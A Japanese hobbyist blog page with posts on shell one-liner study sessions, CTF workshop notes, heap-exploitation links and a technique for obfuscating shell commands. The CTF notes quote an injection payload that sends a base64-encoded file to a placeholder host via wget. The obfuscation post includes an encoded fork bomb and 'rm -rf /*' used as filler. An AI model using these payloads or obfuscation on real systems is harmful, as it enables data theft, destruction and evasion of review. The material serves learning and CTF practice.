ニュース

第28回基準値を超えるシェル芸勉強会に参加させて頂きました!

kanata約1ヶ月前に追加

シェルスクリプト大好きなんですが、毎回新しい知見が得られて、やっぱり面白いですね!
今回は難しかった。。


【問題と解答】第28回基準値を超えるシェル芸勉強会


最近は毎回Twitterのトレンド入りしてる

第28回基準値を超えるシェル芸勉強会

Youtube

第28回シェル芸勉強会(午前の部)
https://www.youtube.com/watch?v=TPzFICWp-sA

第28回シェル芸勉強会(午後の部)
https://www.youtube.com/watch?v=oDolLjPUAx4

第28回シェル芸勉強会(長いLT大会)
https://www.youtube.com/watch?v=uRElj5X0S7k

今回はLTやりました

スライドをどうぞ~

https://www.slideshare.net/kanata1/ss-75315943

内容は以下の話をまとめたものです。

難読化シェル芸

その他、知見メモ

  • LaTexの文字列編集は地獄(awkとsedでがんばってなんとかする)
  • Javascriptでもヒルベルト曲線が書ける
  • C#でもシェル芸ができる

技術書典2に行ってキマシタワー

kanata約1ヶ月前に追加

技術書典2に行ってきました。

技術書典2:技術書オンリーイベント

僕らが作る。 技術書オンリーイベント第2回開催決定! 2017年4月9日(日) 秋葉原 アキバ・スクエア

技術書の同人誌販売な感じのイベント。去年に引き続いての2回目。規模が大きくなりました。

コミケは行ったことがないのだけれど、技術書典だけは去年に引き続いて2回目。早めに行ったから早めに入れたんだけど、めっちゃ並んでた。
でも、早めにいって並んでた方がいいよ!変える時、その列が3倍の長さになっているのを見た。

去年と比べ、ソフト関係よりハード関係が増えている印象。ロボット、IOT、ラズパイ、ROS…どれも面白そうだわ。。

20170409_techbookfest2_1.jpg

買った時点でなんか満足感を得たんだけど、ここから読むのがまた面白いんだよね。
ちょこちょこ読ませて頂きます!

以下を買いました。読むのが楽しみ。

でざぱたん

でざぱたん公式Webページ

新ジャンル!? ...

デザインパターンの本。GoFとか、あんまり理解していないやつがあって、もやもやしてたので、勉強する良い機会。

脆弱性

技術書典2:きじゃくせい 詳細

コミケで頒布したコンピュータセキュリティに関するコラムと新刊(ハニーポットとdockerの本)の予定です

セキュリティ大好き人間としては買わずにはいられない

Lantern - 新感覚マルウェア解析ミステリー

技術書典2:Lantern 詳細

マルウェア解析ミステリー (PE/x86)

セキュリティ関係は事前にチェックしていたので、気になってました。私が初購買者だそうで、光栄でございます。ゆっくり読ませて頂きます!しかも100円だった。良心的。

今年のオライリーさん

今までのオライリーの全書籍が入ってたとすると、紙で買うと160万円するので、60万円くらいお得ですね!!

ちょっとシェル芸で確認してみましょう。

$ curl -s  http://www.oreilly.co.jp/catalog/index.html|grep price|wc -l
467
$ curl -s  http://www.oreilly.co.jp/catalog/index.html|grep price|cut -d'>' -f9|cut -d' ' -f1|tr -d ',th<'|tr '\n' '+'|sed -e 's/$/0/g'|cut -c2-|bc
1604880

という訳で、2017.4.9時点だど、467書籍あって、合計160万4880円でした。
そのCDに全部入ってるとすると、なんと!60万4880円お得!やりますねオライリー!買わんけど。

参考 オライリー・ジャパンの書籍全部買ったら、おいくらになるか俺の中で話題

フロッピーのフィギュアと煎餅

20170409_techbookfest2_2.jpg

懐かしの3.5インチFDの奥に見えるのは5インチのFDか。。。みんな物持ちいいなぁ。

Javaで使ってるクラスがスレッドセーフなのかスレッドアンセーフなのか調べる

kanata2ヶ月前に追加

Javaって、使ってるクラスがスレッドセーフなのかスレッドアンセーフなのか、JavaDocとか見て地道に調べるしかないん?
そう言われれば、Javaってスレッドアンセーフとかそんなに気にしてなかったな。。
singletonなインスタンス変数に、複数スレッドからwriteするような場合だけ、synchronizedつけるかどうか、気にするぐらいで済むからかな?

スレッドアンセーフかどうか調べる

JavaDockから、"スレッド"という単語が含まれている文を抜き出す。簡単だけど、それでだいたい判断できる。
シェル芸でやってみた。Qの変数にクラス名を設定する。

$ Q="StringBuffer";P=`curl -s -L http://docs.oracle.com/javase/jp/7/api/overview-tree.html|grep /$Q.html|awk -F'"' '{print $4}'`;curl -s -L http://docs.oracle.com/javase/jp/7/api/$P|sed 's/<[^>]*>//g'|grep "スレッド"
スレッドセーフな可変の文字列。文字列バッファーは String に似ていますが、変更できる点が異なります。文字列バッファーには常に文字列が格納されていますが、文字列の長さと内容は特定のメソッドの呼び出しにより変更できます。
文字列バッファーは複数のスレッドによって安全に使用することができます。メソッドは必要に応じて同期化され、特定のインスタンスでのすべてのオペレーションが、関連のある個々のスレッドによって行われるメソッドの呼び出しの順序と一致する連続した順序で発生するように動作します。
 JDK 5 以降、このクラスは単一のスレッド StringBuilder により使用されるよう設計された等価のクラスで補足されています。 StringBuilder クラスは、このクラスと同じ処理をすべてサポートしながらも高速であり、同期を実行しないので、通常はこのクラスに優先して使用される必要があります。

スレッドアンセーフを気をつけなきゃいけないクラス一覧

ともあれ、一覧を作ってみたので晒す。
作ってみたものの・・・実用的には「う~ん」な感じだけれど。

以下参照

当ページのWiki Java - Appendix スレッドセーフ・スレッドアンセーフについて

katagaitai CTF勉強会#7 #8 - 関東|med に参加してきました

kanata3ヶ月前に追加

脳が疲れたww
良い勉強会でございました。

katagaitai CTF勉強会 #7 - 関東|med : ATND
katagaitai CTF勉強会 #8 - 関東|med : ATND

trmrさんの部

ナップサック暗号!どういうものか解った!(解けるとは言っていない)

結論:MHナップサック暗号は、CTF的にいうと数パターンしかない。SageMathとか使って、LLLアルゴリズムでぶん殴れ!!!


あと、「(たぶん)日本で一番早いSHA-1衝突の勉強会」をしてくださいました。私が理解したポイントは・・・

  • マークス・ティーブンスはハッシュ衝突界のガチの人
  • 暗号屋さん的には予測の範囲内(前々回の勉強会でもtrmrさんが触れてた)
  • MD5から13年も破られてない。似たような構造の割にけっこう持ったという印象らしい。
  • GPU110個使って、1年間ぶん回して衝突させた(それでも、計算量は総当りよりは10万分の1で済んだ)
  • クラウドに換算すると11万ドル程かかる
  • Googleさんは、90日後に全てを明らかにすると言っている。さぁ、90日間のハッシュ衝突CTFの開催だ!

yskさんの部

2016年度のSECCON SECCON TOWERこと腕木通信の塔 しかり、ハードウェア系は「あ、こりゃダメだわ、完全に解けない領域に入ったわ」と思って、そっ閉じしてたんだけど、、

根気さえあれば解けるということが解った!!回路図を起こすのが、なんというか、すごいなコレ・・・
さすが、400点の価値はある。

神は最初にNANDを作り、それからORとかXORとかANDとかNOTとかいろいろ作った。

NANDの組み合わせで、全ての論理回路が実現できるという事を知ってれば、わりと解答に早く辿り着けるんだね。面白い問題だわ・・・

takさんの部

これ、とても良い資料でした。公開、期待しています!!
小さいバイナリながら、Pwnに必要な要素(bss領域のオーバーフローかーらーのー)が随所に仕込まれているので、これは大変勉強になる問題ですね!

ちょっと面白いバックコネクトの方法を紹介して頂きました。

CMD = ";wget http://999.999.999.999/\$(cat flag|base64);sleep 10;"

自前のWebサーバを持っていれば、404と共にフラグがアクセスログに記録される。CTFだとflagさえ読めればいいので、無理にシェルでバックコネクトしなくてもいいし、楽かも。

bataさんの部

怒涛の337ページ・・・っ!!5時間ほどぶっ続けで喋るbataさん・・・っ

PEとELFを比較して説明してくれていて、Windowsのセキュリティ機構を整理して説明していて、かつ、複雑なヒープの話を説明してかつ、exploitまで書いちゃおうという・・・すごい資料。すごい資料ヤバイ。

これだけで参考書一冊二冊の情報量を超えているので、脳が死にましたw

これはもー、あとからゆっくり拝読させて頂きます。だいぶWindowsとPEに詳しくなれたような気がしてきました。

Windowsのセキュリティ機構って、意外にしっかりしてました。今のWindowsなら、バッファオーバーフローの脆弱性をついてシェルを奪取するって、かなり難しいんじゃないかな。。少なくともLinuxよりも難しい気がします。


スライドの中にも各種ツールの紹介がありますが、昔、Windowsでマルウェアの挙動とかを調べるツールを教えて貰ったことがあるので、参考までにご紹介しておきます。

bataさんからも紹介してもらってましたが、特にAPI Monitorが、ものすごい便利そうです。

産学連携セミナー インシデントレスポンス概論 を受講してきました

頂き物

メモ帳もらったよ!!ありがたく使わせて頂きます。

20170225_katagaitaictf_1.jpg

余談

新ホワイトハッカ飴3000缶wwwww
待ってます。

第27回sedこわいシェル芸勉強会に参加させて頂きました!

kanata3ヶ月前に追加

シェルスクリプト大好きなんですが、毎回新しい知見が得られて、やっぱり面白いですね!
今回はsedでした。
sedの奥深さにやられて、模範解答以上にうまく書けた解答がなかった(吐血)ので、自分用のメモ用に関連情報を載せておきたいと思います。
ほんとsedって置換でしか使ってなかったよ。。


【問題と解答】第27回sedこわいシェル芸勉強会


togetterが1000tweet超えてる。そりゃトレンド入りするわwww

第27回sedこわいシェル芸勉強会

Youtube

第27回シェル芸勉強会(午前/鳥海)
https://www.youtube.com/watch?v=oeNFq5t_frc

第27回シェル芸勉強会(午前2/石井)
https://www.youtube.com/watch?v=cDt2Olr0x84

第27回シェル芸勉強会
https://www.youtube.com/watch?v=BXM4pmvxrq4

その他、知見メモ

  • sedはヤバイ。ループも分岐もできる。
  • sedはヤバイ。特にパターンホルダとプレースホルダがヤバイ。クリップボードにコピペするイメージで使える。
  • 難読化シェル芸が意外に認知されてる。ヤバイ。
  • 最後のLTは、毎回面白いので臆せず参加したほうが良い。ヤバイ。
  • 怪物曲線ヤバイ。まったく読めないがちゃんと動く。ターミナルに曲線が書かれる。ヤバイ。

最後にフリー素材となった横田さんをどうぞ!

20170211_shellgei.jpg

濱⛵せっく 出張版 #2 に参加させて頂きました

kanata3ヶ月前に追加

普段は仕事の都合により平日の勉強会は、ほぼ出れないんですが、今回は都合がついたので「濱⛵せっく」に参加させて頂きました!

  • 濱⛵せっく とは
横濱界隈のセキュリティエンジニアが運営している情報やスキルを共有し合うことを目標とするセキュリティ勉強会です。
セキュリティに興味のある方であれば、学生でも社会人でも無職の方でもどなたでも大歓迎です。
なお、横濱にお住まいでなくても参加できます。

濱せっく 出張版 #2 (2017/02/08 19:00〜)

濱⛵せっく 出張版 #2

漏洩情報漁り的何か

漏洩したアカウント情報。漏洩してもパスワードはハッシュ化されてて読めない大丈夫・・・なわけないですよねwというお話。
Splunk使っている所を初めて見ました。ログ解析には、なんかとても便利そう!

【ハンズオン】無償ツールでできるマルウェア解析101 ~にじみ出る悪意を捉えよ~

ShinoBOTの@Sh1n0g1さんですよ!!

特に以下が興味深かったです。

  • ファジーハッシュ

バイナリの類似性を見るのに使う。通常1bitでも違えばハッシュ値は全く違うものになるが、ファジーハッシュの場合は、そんなに変化がないという話。ssdeepというソフトがあるらしい。バイナリの類似度が解る。

  • その類似度を可視化する自作ツールの紹介。カッコよく可視化されてた。

  • マルウェアのいろいろな情報を調査するCTFを公開してくれた。後ほど問いてみたい~。

攻撃のモニタリングとライブディフェンス的な戦い方の考察

Sysmonという便利ツールを紹介してくださいました。

Sysmonは、Windowsのトラブルシューティング用の63のツール「Sysinternal Suite」に含まれているものです。
私の記憶だと「儂の波動球(ツール)は六十三式まであるぞ」だと思ってたんですが、今だともっと増えてるのかな?

これ動かしておくと、ほんとRATの挙動が手に取るようにわかりますね。。

SECCON 2016 決勝大会・カンファレンスに行きました!

kanata4ヶ月前に追加

金曜・土曜・日曜と3日間ある内の土曜日に行ってきました。
(本当は金曜日とかも行きたかったんだけど仕事がね。。)

印象に残ったのを書きます。

SECCON 決勝

  • 今年は誰でも見学可能!
  • 友利奈緒のような二次元キャラはいなかった。
  • BoB珠玉の結晶である CyKor(韓国) が独走。ここ最近は韓国チームが強い。
  • プロ生ちゃん・・・?

世代別!なぜセキュリティエンジニアはセキュリティを志す(した)のか?

  • 正解は越後製菓の音(オフレコの合図)を乱発wwwww
  • ハッカージャパンが惜しい雑誌だった。復刊して欲しい世代です。
  • 人材育成にCTFは必要かという問い、なかなかに意義深い。

王様達のヴァイキング×SECCON スペシャルトークセッション

撮影厳禁。とても面白かった(こなみ)。
編集さん、漫画さん、作家さん、そして技術監修のお二人の見事な合作という事がわかり、ますますファンになりました。

Googleのエンジニアが技術監修。なるほどなるほど、技術面で精緻に出来てたのはこういうことかぁと納得。

ちになみに、これが本物の是枝くんのPCです。

20170128_seccon_1.jpg

ロボットのセキュリティは安全?ロボットをハッキングしてみよう!

  • ロボットはROSというOSの上で動かす事が多い(昔はZ80とかだったのに。。。時代ですなぁ。。)
  • ROSはベースのOSの上で動くmetaOSと呼ばれるもので、ベースにはUbuntuがよく使われるらしい。
  • ROSは認証なし。デフォルトのポート番号11311
  • ROSはXMLRPC。通信路の暗号化なし。そんな訳で、割と簡単に乗っ取りができる。

以下のコンボで、家を火事に出来るというシナリオを動画で再現してた。なるほど、近い将来ありえないこともないか。。

人の家のロボットを乗っ取り、ロボットのカメラで燃えやすいもの(ティッシュとか)を探す→ヒーターのスイッチを入れる(最近はIR 赤外線で電源が入る)→ロボットで燃えやすいものをヒーターに近づける。

  • ROS2が開発中らしく、セキュリティ面は、これでだいぶリスクが減らせそうである。

その他

パーカーとTシャツを買った。
身につけることによって、サンシャイン池崎ばりのテンションに上げることが出来ると思う。

20170128_seccon_2.jpg

空前絶後のォォ!!!

新春 heap情報まとめ (2コメント)

kanata5ヶ月前に追加

昨年は時間をみて、heapの勉強しておりましたが、これ、heapで軽く本が1冊書けるぐらいの内容です。
CTFのPwnジャンルが解ける人が少ないのは、ひとえにこのheap仕様の難解さが原因の一つでしょう。

いつか、heapに関してまとめようと思ってるんだけど。。何千文字かになりそう。

そんな訳で、私が参照させて頂いている&これから参照したい情報を以下にまとめました。

よくわかる!heapの基礎的(!?)な知識

mallocの旅(glibc編)
http://www.slideshare.net/kosaki55tea/glibc-malloc

malloc(3)のメモリ管理構造
http://www.valinux.co.jp/technologylibrary/document/linux/malloc0001/

NEC 古賀さんによるありがたい解説
http://www.soi.wide.ad.jp/class/20040011/slides/19/45.html
https://www.nic.ad.jp/ja/materials/security-seminar/20041004/3-koga.pdf

The 67th Yokohama kernel reading party(小崎さんのmalloc動画)
https://www.youtube.com/watch?v=0-vWT-t0UHg

Pwn/Exploit heapにまつわる攻撃手法

The Malloc Maleficarum (Bugtraq 2005) - ももいろテクノロジー
http://inaz2.hatenablog.com/entry/2016/12/24/002138

heap exploitationテク走り書き - 生きたい
http://potetisensei.hatenablog.com/entry/2016/12/10/034804

House of Forceの概要と実践(題材:BCTF2016 bcloud) - Pwn d3 r1ng
http://pwn.hatenadiary.jp/entry/2016/12/05/235942

[CB16] House of Einherjar :GLIBC上の新たなヒープ活用テクニック
http://www.slideshare.net/codeblue_jp/cb16-matsukuma-ja-68459648

heapにまつわる脆弱性の実例等

たった1バイトの書き込みが引き起こすルート権限での実行の脆弱性 コンピュータサイエンス POSTD
http://postd.cc/a-single-byte-write-opened-a-root-execution-exploit/

情報セキュリティスペシャリスト試験を受けた話 - しゃろの日記
http://charo-it.hatenablog.jp/entry/2016/12/09/145231

CTFひとり勉強会 Secret Holder (HITCON 2016 Quals) 後編 - ヾノ>ㅅ<)ノシ帳
http://katc.hateblo.jp/entry/2016/10/28/124025

第26回シェル芸勉強会及びエクシェル芸勉強会に参加させて頂きました!

kanata5ヶ月前に追加

シェルスクリプト大好きなんですが、新しい知見が得られて、やっぱり面白いですね!
今回は、自分なりにうまく書けた解答がなかった(吐血)ので、自分用のメモ用に関連情報を載せておきたいと思います。

【問題と解答】第26回シェル芸勉強会及びエクシェル芸勉強会

jus共催 第8回初心者の方角に向いて講師が喋るシェル勉強会(初心者向けとは言ってない)/第26回シェル芸勉強会及びエクシェル芸勉強会

その他、知見メモ

  • ExcelやXMLをいい感じにアレコレするツールは沢山あるっぽいが、 xmllint と hxselect がよさげ。
  • シェルのviモードは、emacs宗派を改宗させる破戒力がある。ヤバイ。
  • Excelの文字列は、展開したファイルのxl/sharedStrings.xmlに順番に入っている(紐付けるIDとかは無い。XMLなのに)。ヤバイ。
  • penというコマンドでMarkdownのプレビューができる。sayは喋る。ヤバイ。

難読化シェル芸を発案した

kanata5ヶ月前に追加

難読化シェル芸

難読化シェル芸とは

内部的な動作の手続き内容・構造・データなどを人間が理解しにくい、あるいはそのようになるよう加工されたシェル芸のこと。

例えばこんなの

普通のdateコマンド

date
20161216日 金曜日 21:19:58 JST

難読化dateコマンド

$'\x64\x61\x74\x65'
201734日 土曜日 13:36:21 JST
$(printf "%b" $(printf '%s%x' '\x' $((0x83 ^ 0xe7))))$(ls --help|grep ^G|cut -c53)$(ls --help|grep ^G|cut -c10)$(ls --help|grep ^G|cut -c8)
20161216日 金曜日 21:19:52 JST

難読化の基本

アスキーコードを記述して実行

俺的備忘録 〜なんかいろいろ〜 bashでコマンドをアスキーコードで記述して実行させる

$ echo -n 'date'|xxd
0000000: 6461 7465                                date
$ $'\x64\x61\x74\x65'         # date 16進数表記
201734日 土曜日 13:36:21 JST
$ $'\144\141\164\145'         # date 8進数
201734日 土曜日 13:47:22 JST
$ $'\u0064\u0061\u0074\u0065' # date Unicodeの表記
201734日 土曜日 13:40:16 JST

コマンド置換で文字を生成して実行

`example` または $(example) で文字を出力する。

exampleの部分を複雑にすることで、難読化を図る

`echo d``echo a`$(echo t)$(echo e)
201734日 土曜日 13:44:33 JST

難読化技法

フェイク(無駄な命令)

例えば、以下は全て無視される。コードの間に入れる事でより複雑な難読化を図ることができる。

$(:;:;:;:;:;:;)
$(: poweroff :;)
$(: rm -rf /* ;)

base64によるエンコード

base64にエンコードすることで、どのような命令かわからないようにする。

dateの難読化

$(echo ZGF0ZQ==|base64 -d)

ちなみに例のアレ(:(){ :|:& };:)は、こんな感じ(実行厳禁!!)

$(echo OigpeyA6fDomIH07Og==|base64 -d)

計算による文字の難読化

ASCIIコードを計算して出力することによって難読化する。

vの出力

echo $(printf "%b" $(printf '%s%x' '\x' $((0x15 ^ 0x63))))
v

ハッシュ値から必要な文字を得る

MD5等のハッシュ値を出力することで、0123456789abcdefABCDEFの文字を得ることができる。

Fの出力

$(echo -n |md5sum|cut -c10|tr a-z A-Z)
F

コマンドで同じ結果になる部分から文字を得る

例えばpwdコマンドの最初に1文字目は、必ず'/'になる。

echo $(pwd|cut -c1)
/

date '+%s' の最初の1文字目は、必ず1になる(と思って差し支えない。UNIX通算秒なので)。

echo $(date '+%s'|cut -c1)

lsのヘルプには、通常以下の文字列が含まれるため、これを利用できる。

ls --help|grep ^G
GNU coreutils online help: <http://www.gnu.org/software/coreutils/>

helpの出力

echo $(ls --help|grep ^G|cut -c22-25)
help

man asciiから文字列を得る

調査中

システムが普遍的に抱えている不変な情報から文字を得る

これが難読化に対しては最も有用では
実行してみるまで、どんな文字列になるか非常に解りにくい。
しかし、どのようなLinuxディストリビューションでも同じ値を抱えているものというのは、意外に見つからない。

私が発見したものは以下になる。おそらく、この文字列は、どのLinuxディストリビューションでも変わらない。

xxd /bin/ls|head -1
0000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............

ここから、.:01456cfELFの文字を得ることができる。

パイプレス

パイプを使用しないことで難読性を高める

A. 割りと死ななかった

パイプをキーで入力せずとも、アスキーコードから呼び出してevalで実行すればよいということか…

$ seq 100 |head -n 8 |tail -n 5 |sed 2,4d
4
8
$ sed 2,4d <(tail -n 5 <(head -n8 <(seq 10)))
4
8
$ eval $(echo -e seq 100 "\0174" head -n 8 "\0174" tail -n 5 "\0174" sed 2,4d)
4
8

awk芸によるコマンド機能の代替

awkで一般的によく使われるコマンド機能を代替して、読みにくくする。
ただawkに関しては、注意深く読めば読解できる点に注意が必要。

AWK 一行野郎百裂拳 - 日本 GNU AWK ユーザー会 - No-ip.org

sed芸によるコマンド機能の代替

sedで一般的によく使われるコマンド機能を代替して、読みにくくする。
もぅわからん。

tacの代替

第27回sedこわいシェル芸勉強会 Q8

sed '1!G;h;$!d'

touchの代替

sed 'w a' aa と実行すれば...

sed 'w filename' /dev/null

treeの代替

Qiita - tree コマンドが無い環境で tree コマンドを実現

find . | sort | sed '1d;s/^\.//;s/\/\([^/]*\)$/|--\1/;s/\/[^/|]*/|  /g'

Vimシェル芸によるコマンド機能の代替

深淵

その他、普通のコマンドの使い方をしない

echoの代替

Hello Worldコレクション

$ basename 'Hello World'
Hello World
$ date +'Hello World' 
Hello World

lsの代替

echo *
printf %s *

難読化シェル芸ツール

手動により難読化しても良いが、ツールを作ってみた。

インストール

NandokukaShellGei.sh

シェルスクリプトなのでダウンロード&実行権限付与でOK

wget https://raintrees.net/attachments/download/391/NandokukaShellGei.sh
chmod u+x NandokukaShellGei.sh

動作環境

一般的なLinuxディストリビューションで、だいたい動くと思う。
以下で動くことを確認した。

  • CentOS7
  • KaliLinux

ただコマンドの組み合わせによっては、なんか不具合がおきたりする。原因は調べてない。

Macで動くかは、ちょっと自信ない。

実行例

$ ./20161216_NandokukaShellGei.sh "echo HelloWorld"
e       ls --help|grep ^G|cut -c8
c       ls --help|grep ^G|cut -c5
h       ls --help|grep ^G|cut -c22
o       ls --help|grep ^G|cut -c6
        xxd /bin/ls|head -1|cut -c9
H       ls --help|grep ^G|cut -c22|tr a-z A-Z
e       ls --help|grep ^G|cut -c8
l       ls --help|grep ^G|cut -c12
l       ls --help|grep ^G|cut -c12
o       ls --help|grep ^G|cut -c6
W       ls --help|grep ^G|cut -c36|tr a-z A-Z
o       ls --help|grep ^G|cut -c6
r       ls --help|grep ^G|cut -c7
l       ls --help|grep ^G|cut -c12
d       echo -n|md5sum|cut -c1

$(ls --help|grep ^G|cut -c8)$(ls --help|grep ^G|cut -c5)$(ls --help|grep ^G|cut -c22)$(ls --help|grep ^G|cut -c6)$(xxd /bin/ls|head -1|cut -c9)$(ls --help|grep ^G|cut -c22|tr a-z A-Z)$(ls --help|grep ^G|cut -c8)$(ls --help|grep ^G|cut -c12)$(ls --help|grep ^G|cut -c12)$(ls --help|grep ^G|cut -c6)$(ls --help|grep ^G|cut -c36|tr a-z A-Z)$(ls --help|grep ^G|cut -c6)$(ls --help|grep ^G|cut -c7)$(ls --help|grep ^G|cut -c12)$(echo -n|md5sum|cut -c1)
$
$ #以下、出力されたコードをコピペ 
$ $(ls --help|grep ^G|cut -c8)$(ls --help|grep ^G|cut -c5)$(ls --help|grep ^G|cut -c22)$(ls --help|grep ^G|cut -c6)$(xxd /bin/ls|head -1|cut -c9)$(ls --help|grep ^G|cut -c22|tr a-z A-Z)$(ls --help|grep ^G|cut -c8)$(ls --help|grep ^G|cut -c12)$(ls --help|grep ^G|cut -c12)$(ls --help|grep ^G|cut -c6)$(ls --help|grep ^G|cut -c36|tr a-z A-Z)$(ls --help|grep ^G|cut -c6)$(ls --help|grep ^G|cut -c7)$(ls --help|grep ^G|cut -c12)$(echo -n|md5sum|cut -c1)
HelloWorld

1 2 3 ... 9 (1-10/90)

他の形式にエクスポート: Atom

クリップボードから画像を追加 (サイズの上限: 100 MB)